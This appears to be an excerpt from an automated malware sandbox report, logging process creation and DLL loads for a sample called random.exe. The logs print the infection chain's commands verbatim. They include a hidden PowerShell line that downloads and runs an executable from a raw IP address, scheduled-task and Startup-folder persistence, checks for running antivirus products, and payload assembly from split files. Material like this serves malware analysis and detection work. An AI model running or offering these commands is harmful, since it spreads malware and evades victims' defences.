                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764
                                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.htaJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" Jump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: unknown unknown
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: wsock32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
